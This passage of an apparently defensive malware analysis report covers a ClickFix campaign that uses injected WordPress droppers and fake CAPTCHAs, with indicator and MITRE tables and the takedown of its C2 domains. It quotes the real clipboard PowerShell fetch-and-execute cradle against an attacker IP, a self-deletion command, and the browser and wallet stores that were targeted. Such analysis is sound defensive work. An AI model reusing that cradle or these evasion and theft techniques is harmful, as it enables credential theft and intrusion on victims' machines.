svchost.exe and chrome.exe, credential harvesting from major browsers and cryptocurrency wallets, C2 beacon communication, and self-deletion. Joe Sandbox independently confirmed a score of 100/100 (Malicious) via YARA, Suricata IDS, and full behavioral analysis.
A second artifact — a heavily obfuscated JavaScript file (
payload.js) — is a confirmed component of the same chain: it is served directly from the C2 infrastructure to the infected page and subsequently invoked by one of the downstream PowerShell or injected svchost processes. It delivers a Python 3.12-based second-stage implant with direct syscall EDR evasion and process injection into wab.exe. It is documented in full in Section 4.
Indicators of compromise linked to the same
ntdnewtds.shop infrastructure were found across at least three other independently confirmed malicious sites, confirming this is an active, coordinated campaign with broad reach beyond the analyzed sample.
Drive-By Download via Compromised Website
The attack begins when a visitor navigates to the compromised site. A malicious JavaScript dropper is injected directly into the WordPress HTML, disguised as a performance optimizer (window.__performance_optimizer_v6). Upon page load, the dropper decodes two Base64-encoded C2 domain strings at runtime:
A synchronous XMLHttpRequest fetches a remote JavaScript payload from ntdnewtds.shop/jsrepo?rnd=<random>. The Math.random() cache-buster prevents CDN/proxy caching of the payload URL. If the primary C2 fails, the dropper falls back to dnsnewtds.shop. The fetched remote script is then injected into the page's <head> as a dynamic <script> element and executed immediately in the victim's browser.
A second script block — a 1.26 MB heavily obfuscated JavaScript blob (_0x59bb, 17,914-element string array, custom rotation cipher) — is also present in the page and is consistent with fingerprinting or secondary payload delivery functionality. Its full behavior could not be statically decoded.
T1189 Drive-by Compromise T1059.007 JS Interpreter T1027 Obfuscation
Fake Cloudflare CAPTCHA + Clipboard Hijacking
The remotely fetched JavaScript renders a convincing fake Cloudflare "Verify you are human" CAPTCHA within the page. The CAPTCHA UI instructs the visitor to press Win + R, paste from clipboard, and click OK — a social engineering technique to trigger PowerShell execution without the browser having direct shell access.
Simultaneously, the script silently writes the following obfuscated PowerShell command to the victim's clipboard via the Clipboard API:
The IP address 178.16.52.232 is broken into string concatenation fragments to evade static pattern matching in email security gateways and browser-based heuristics. irm (Invoke-RestMethod) fetches the next-stage payload; iex (Invoke-Expression) executes whatever content is returned, with errors suppressed via 2>$null.
T1204.001 Malicious User Execution T1115 Clipboard Data T1036 Masquerading
Obfuscated PowerShell — First-Stage Payload Download
When the victim executes the Run dialog command, PowerShell (PID 7408) is spawned. The command reassembles the target IP at runtime and calls Invoke-RestMethod against http://178.16.52.232/. The content returned is immediately passed to Invoke-Expression for in-memory execution — no file is written to disk at this stage.
This download-and-execute cradle spawns a child PowerShell process (PID 4908) that proceeds to fetch the second-stage payload:
Both C2 servers at this stage are on ASN 202412 (OMEGATECH, SC). Avira URL Cloud flagged 178.16.52.232 as malware. Note: sandbox-reported ASN attribution (JANET Jisc, ASN 786) reflects spoofed origin data — origin monitoring confirms actual hosting on AS202412.
T1059.001 PowerShell T1140 Decode at Runtime T1562.001 Impair Defenses
Compile-After-Delivery — Malicious C# DLL
The payload downloaded from 158.94.208.92 includes malicious C# source code. Rather than dropping a pre-compiled binary — which would be trivially flagged — the attacker delivers source and compiles it on the victim machine at runtime using the legitimate Windows tool csc.exe (PID 7556).
The compiler input is written to disk as %TEMP%\tr0oowwq.cmdline, and the output is the DLL tr0oowwq.dll (PE32 .NET assembly, 3,584 bytes). This file is detected as TR/Rozena.Gen by Avira and represents the actual credential-stealing implant.
Compile-after-delivery is a known AV-evasion technique: the final binary never exists on disk before compilation, frustrating signature-based detection that scans downloaded files.
T1027.004 Compile After Delivery T1036.005 Masquerade Filename
PE Injection into svchost.exe + chrome.exe
PowerShell (PID 7408) uses WriteProcessMemory and CreateRemoteThread to inject the compiled PE payload into the legitimate Windows service host process svchost.exe at base address 0x2189A740000. The injected svchost.exe then serves as the primary execution environment for the malicious payload, inheriting the process's trust level and evading process-based detection heuristics.
From within the injected svchost.exe context, a second injection is performed into chrome.exe at base address 0x2A1C94D0000, enabling direct access to browser memory — facilitating credential and cookie extraction without needing to read encrypted credential stores from disk in all cases.
DLL load proxying of wininet.dll and mscoree.dll from RWX memory regions is also present, suggesting additional hook evasion or capability loading.
T1055 Process Injection T1574 Hijack Execution Flow
Credential Theft, Wallet Targeting, C2 Beacon, and Self-Deletion
The injected svchost.exe performs the following post-exploitation activities:
Browser Credential Theft: Accesses Chrome History, Chrome Cookies (via Windows Restart Manager abuse to unlock the live Cookies SQLite file), and Firefox key4.db (the Firefox master password store).
Cryptocurrency Wallet Targeting: Enumerates and targets Electrum wallet files at %AppData%\Roaming\Electrum\wallets and Jaxx IndexedDB at com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb.
C2 Communication: DonutLoader beacons to 158.94.208.104:80 over plain HTTP, confirmed by Suricata ETPRO rule 2867081 ("DonutLoader Requesting Additional Payload"). This server is on AS202412 (OMEGATECH, SC) — sandbox-reported ASN 786 (JANET Jisc) reflects spoofed origin data.
Sandbox Detection: WMI query SELECT Name, CurrentHorizontalResolution, CurrentVerticalResolution FROM Win32_VideoController is executed to detect virtual machine environments before proceeding.
Self-Deletion: After payload execution, the implant removes itself via cmd.exe /C ping 1.0.0.1 & del "C:\Windows\system32\svchost.exe". The ping introduces a timing delay before the delete to ensure the process has exited.
T1555.003 Browser Credentials T1005 Local Data T1071.001 Web Protocol C2 T1070.004 File Deletion
payload.js (SHA256: 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9) is a confirmed component of the primary attack chain. It is loaded onto the infected page directly from C2 infrastructure and subsequently invoked by a downstream PowerShell process or injected svchost instance. Sandbox analysis results: Joe Sandbox webid 1892677, Score: 100/100. Confidence rating is 7/10 due to absence of an exact hash match in sandbox records and incomplete static deobfuscation of the RC4+Base64 string array — behavioral conclusions are inferred from a closely matched sample.
payload.js uses obfuscator.io-style string-array obfuscation: 17,914 Base64+RC4-encoded elements, hex variable names (_0x59bb, _0xc62d84), array rotation value 324,980, and an anti-debug/anti-tamper loop using constructor/apply/RegExp DevTools detection. The decode function _0x5656(index, key) applies RC4 decryption to Base64-decoded elements at runtime.
Before proceeding, the dropper reads the registry key HKCU\Control Panel\International\Geo Nation — a country-awareness check consistent with targeted malware that skips execution in certain regions. It also queries WMI and COM objects (WBEM Locator, WSH Shell) for environmental fingerprinting.
Execution proceeds by spawning rundll32.exe shell32.dll,ShellExec_RunDLL powershell.exe -EncodedCommand <base64> — a living-off-the-land proxy execution technique that hides PowerShell behind a trusted Windows binary.
The Base64-decoded PowerShell command executes hidden (-WindowStyle Hidden) with RemoteSigned policy and immediately disables SSL certificate validation via ServerCertificateValidationCallback={$true}. TLS 1.2 is explicitly set. A spoofed Mozilla/Chrome User-Agent and Referer: https://www.filemail.com/ header are set before downloading python312x64.zip (~14.5 MB) from:
The archive is extracted to %APPDATA%\Roaming\Templates\python312x64\, then pythonw.exe Protected.py is launched. The ZIP is deleted after extraction. A parallel execution chain using SyncAppvPublishingServer LOLBin is also spawned.
Protected.py (62 KB, obfuscated, SHA256: 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896) is executed by the bundled Python 3.12 runtime. A full PyCryptodome suite is dropped alongside it (AES, RSA, ECC, ChaCha20, Blowfish, DES, Salsa20), indicating cryptographic C2 communication or data encryption capability in the final payload — the exact usage is not confirmed by the available evidence.
Three identical malicious PE32+ executables (wc7F65.tmp, wc9E28.tmp, wcED47.tmp, 307 KB each) are dropped to %TEMP%, loaded into memory, then deleted from disk — leaving only in-memory artifacts. All three are detected by Avira (HEUR/AGEN.1318544) and ReversingLabs (34%).
Process injection targets wab.exe (Windows Address Book, three instances PIDs 1752, 3152, 5032) via NtMapViewOfSection (read-only DLL mapping) and NtSetContextThread (thread register hijacking). Direct syscalls (NtCreateFile, NtReadFile, NtWriteFile from address 0x180076169) bypass EDR user-mode hooks entirely. A custom stack switch further evades stack trace analysis by security products.
| Type | Indicator | Status | Context |
|---|---|---|---|
| DOMAIN | ntdnewtds.shop | Neutralized | Primary C2 injector domain — Base64-decoded from HTML dropper; confirmed malicious (20 Joe Sandbox hits, DonutLoader) · CLIENTHOLD / SERVERHOLD — suspended by NameSilo (Ticket #32976692, 2026-05-14) |
| DOMAIN | dnsnewtds.shop | Neutralized | Fallback C2 injector domain — Base64-decoded from HTML dropper · CLIENTHOLD / SERVERHOLD — suspended by NameSilo (Ticket #32976692, 2026-05-14) |
| URL | https://ntdnewtds.shop/jsrepo?rnd=<random> | Neutralized | Primary remote JS payload URL with Math.random() cache-buster · non-resolving (CLIENTHOLD) |
| URL | https://dnsnewtds.shop/jsrepo?rnd=<random> | Neutralized | Fallback remote JS payload URL · non-resolving (CLIENTHOLD) |
| IP | 178.16.52.232 | Malicious | Stage 1 PS payload server (DUSNET-ASDE, Germany) — Avira: malware |
| IP | 158.94.208.92 | Malicious | Stage 2 PS payload server (AS202412, OMEGATECH SC) — sandbox ASN 786 reflects spoofed origin |
| IP | 158.94.208.104 | Malicious | DonutLoader C2 beacon server — Suricata ETPRO rule 2867081, port 80 |
| IP | 91.92.243.161 | Suspicious | THEZONEBG (Bulgaria) — contacted during analysis, role unconfirmed |
| SHA256 | 7c8408456d36743beffffae6bbfa896ec0308f74ce849cd44882ab9d41e17d96 | Malicious | tr0oowwq.dll — TR/Rozena.Gen compiled credential stealer |
| SHA256 | cdb6e4c7c6a93f73bbe632658ea30c18326474f24ecaae64f71cf738292b2c93 | Malicious | tr0oowwq.cmdline — .NET compiler input file dropped to %TEMP% |
| SHA256 | 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 | Malicious | Obfuscated JS file — main page artifact (1.26 MB _0x59bb block) |
| CLIPBOARD | powershell "Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null" | Malicious | ClickFix clipboard payload — copied to victim by malicious JS |
| REGISTRY | HKCU\Google\Chrome\Default\Network\Cookies | Targeted | Chrome cookie store — accessed via Windows Restart Manager abuse |
| FILE | %TEMP%\tr0oowwq.dll / .cmdline | Malicious | Compile-after-delivery artifacts dropped to temp directory |
| SHA256 | d49cec3251ccfdf61d73533596de85e2ece3b7878a11c022a520d3404f8166c9 | Malicious | wc7F65.tmp / wc9E28.tmp / wcED47.tmp (identical) — payload.js chain component, dropped to %TEMP% and deleted post-load |
| URL | https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIes... | Malicious | python312x64.zip download URL — payload.js chain component, stage 2 downloader |
| SHA256 | 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 | Malicious | Protected.py — obfuscated Python second-stage implant |
| SIGMA | Suricata ETPRO 2867081 | Triggered | "DonutLoader Requesting Additional Payload" — 158.94.208.104:80 |
| Tactic | Technique ID | Technique | Evidence |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | Compromised WordPress site injected with malicious JS dropper fetching from ntdnewtds.shop |
| Execution | T1204.001 | User Execution: Malicious Link | ClickFix social engineering: fake CAPTCHA instructs Win+R → paste → OK |
| Execution | T1059.001 | PowerShell | Clipboard payload → iex(irm('178.16.52.232')); child PS → Invoke-WebRequest + iex against 158.94.208.92 |
| Execution | T1059.007 | JavaScript | Malicious JS dropper synchronously fetches and executes remote JS via XHR + dynamic script injection |
| Execution | T1027.004 | Compile After Delivery | Malicious C# compiled at runtime via csc.exe from tr0oowwq.cmdline → tr0oowwq.dll |
| Defense Evasion | T1027 | Obfuscated Files | Base64 C2 domains; 1.26 MB custom string-array JS; PowerShell string concat to hide IPs |
| Defense Evasion | T1055 | Process Injection | PE injected into svchost.exe (0x2189A740000) and chrome.exe (0x2A1C94D0000) via WriteProcessMemory + CreateRemoteThread |
| Defense Evasion | T1070.004 | File Deletion | Self-deletion via cmd /C ping 1.0.0.1 & del svchost.exe; wc*.tmp deleted post-memory-load |
| Defense Evasion | T1497.001 | System Checks (Sandbox) | WMI Win32_VideoController query for VM resolution detection |
| Defense Evasion | T1574 | Hijack Execution Flow | DLL proxying of wininet.dll / mscoree.dll from RWX memory; rundll32 proxy exec (payload.js chain) |
| Defense Evasion | T1106 | Native API (Direct Syscalls) | payload.js chain: NtCreateFile, NtReadFile, NtWriteFile from 0x180076169 bypass EDR user-mode hooks |
| C2 | T1071.001 | Web Protocols | DonutLoader HTTP beacon to 158.94.208.104:80; python312x64.zip over HTTPS TLS 1.2 |
| C2 | T1102 | Web Service | Math.random() cache-buster on C2 URLs evades proxy/CDN caching of remote payloads |
| Credential Access | T1555.003 | Browser Credentials | Chrome History, Cookies (Restart Manager abuse), Firefox key4.db |
| Collection | T1115 | Clipboard Data | clipboard.writeText() injects PS payload to victim clipboard as part of ClickFix attack |
| Collection | T1005 | Data from Local System | Electrum wallets (%AppData%\Roaming\Electrum\wallets), Jaxx IndexedDB |
| Discovery | T1614.001 | System Language Discovery | payload.js chain reads HKCU\Control Panel\International\Geo Nation — country-aware execution |
| Execution | T1218.011 | Rundll32 Proxy Execution | payload.js: WScript → rundll32.exe shell32.dll,ShellExec_RunDLL → powershell.exe |
Following coordinated abuse reporting, NameSilo placed both
ntdnewtds.shop and dnsnewtds.shop on CLIENTHOLD / SERVERHOLD status (Ticket #32976692, 2026-05-14). Both domains are non-resolving. With both the primary and fallback C2 endpoints suspended, the synchronous XHR call in the tji-mu-js dropper runs to a brick wall on every infected page — the malware chain is currently non-functional end-to-end. No remote JS payload can be fetched or executed regardless of which compromised site a visitor lands on. Note that CLIENTHOLD does not remove the injected dropper code from compromised WordPress sites — the chain may re-activate if the C2 infrastructure is re-registered or migrated to new domains.
ntdnewtds.shop dropper infrastructure operating across at least three other WordPress/WooCommerce sites (Joe Sandbox webids: 1911979, 1910694, 1893314), all scoring 100/100 Malicious with identical DonutLoader/ClickFix signatures. This indicates an active, multi-target campaign using shared C2 infrastructure, not an isolated incident. The site under analysis is one of multiple confirmed victims. No conclusions are drawn regarding campaign attribution, threat actor identity, or targeting intent beyond what the sandbox data directly supports.
Related confirmed victims:
rangerfirearmsoftexas.com — webid 1911979 · Score 100 · DonutLoader / phis.troj.expl.evadthecleaninggurus.co.uk — webid 1910694 · Score 100 · DonutLoader / phis.troj.expl.evadporchlighthealth.com — webid 1893314 · Score 100 · DonutLoader / troj.spyw.expl.evad